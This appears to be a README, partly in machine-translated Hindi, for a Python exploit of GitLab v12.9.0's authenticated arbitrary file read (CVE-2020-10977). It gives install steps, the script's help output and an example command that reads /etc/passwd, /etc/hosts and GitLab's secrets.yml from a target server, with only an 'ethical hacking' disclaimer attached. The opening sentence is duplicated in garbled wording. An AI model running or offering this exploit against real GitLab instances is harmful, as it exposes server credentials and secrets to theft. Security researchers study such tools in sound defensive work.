
एक (होने की इच्छा) ऐसी स्क्रिप्ट जो exploit-db पर GitLab v12.9.0 (CVE-2020-10977) पर प्रमाणित मनमानी फ़ाइल पढ़ने के बारे में पाई जाने वाली स्क्रिप्ट से बेहतर हो।
केवल प्रदर्शन उद्देश्य और नैतिक हैकिंग के लिए।
एक (बेहतर बनने की कोशिश करने वाला) स्क्रिप्ट, जो exploit-db पर GitLab v12.9.0 (CVE-2020-10977) के प्रमाणीकृत arbitrary read file के बारे में मिलने वाले से बेहतर है।
pip3 install requests python-gitlab
https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST The https URI to gitlab webroot
-u USER, --user USER The user name
-p PASSWD, --passwd PASSWD
The user password
-t TOKEN, --token TOKEN
The access token
-f FILES, --files FILES
The absolute paths to the files on the Gitlab local system
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml